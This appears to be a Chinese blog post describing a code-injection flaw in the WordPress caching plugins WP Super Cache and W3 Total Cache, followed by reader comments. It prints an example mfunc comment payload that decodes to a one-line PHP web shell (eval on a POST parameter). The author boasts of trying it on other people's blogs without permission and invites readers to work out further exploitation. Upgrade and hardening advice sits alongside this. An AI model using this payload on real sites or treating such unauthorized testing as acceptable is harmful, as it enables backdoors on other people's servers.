wp-super-cache 1.3以下版本,w3-total-cache 0.9.2.9以下版本均存在此漏洞.
漏洞原理是缓存插件在生成一个页面的新缓存时,解析了PHP代码片段。我们将PHP代码写入到目标的文章评论中,当缓存更新后,就可实现插入后门等行为。
举例
[php]
<!–mfunc eval(base64_decode(redacted, see a trend here)); –><!–/mfunc–>
/*base64加密的诸如*/eval($_POST[“lu”]);/*一句话后门可在这里被执行*/
/*后门地址为:http://blog/wp-content/redacted*/
[/php]
我把用了这两款插件的诸位都测试了一下,发现绝大多数博主都有着更新插件的好习惯。特地试验了几个坏人的,这下我终于有办法治你们了哇哈哈。
解决方案
这漏洞在公布前就被玩过一段时间了,所以你是不是在睡梦中就被人家搞了我也不知道。
最简单的解决方法是升级到两款插件的最新版本。
未雨绸缪
wordpress优秀的扩展性能导致了在对wp进行入侵时大多都会在插件上找到突破口。我们无法预料到哪款插件会出现0day。
如果非要使用wordpress,应尽量少的使用插件,并尽量隐藏插件的特征。例如修改插件代码,去掉其在页面中的注释。使用重写规则隐藏掉插件的目录。
提问
如果目标网站使用了多说等社会化评论插件,该如何利用此漏洞呢?考思路的,第一个答对的也没奖励。
……
那天早晨在火车上穿白丝秋裤得瑟,赶上降温。导致感冒了三天,发烧不退。今天查了一下禽流感的症状,结论是如果是禽流感的话,我应该早就挂了。目前病情有所缓解,但依然可以接受诸位的慰问及礼物。


这么牛逼的一篇文章评论这么少是么
表示当初就是看到这样的类似文章,我就再也没有用 Cache 插件了
不过很快就补了。。。当时是0.9.2.5(记得好像,我之前有写文章说过改了W3TC,一笔带过)
W3TC,被人利用过。
这时间感冒都会不自然的联想到禽流感~~~
没用过这个插件…
我要约照片上的这个姑娘
缓存插件貌似一直没启用…倒是更新了的.
你的LOGO做得真好,+2赞
不管了。已经打算不用wordpress了
唉,站着撸吧
我是板凳!
沙发居然抢到了?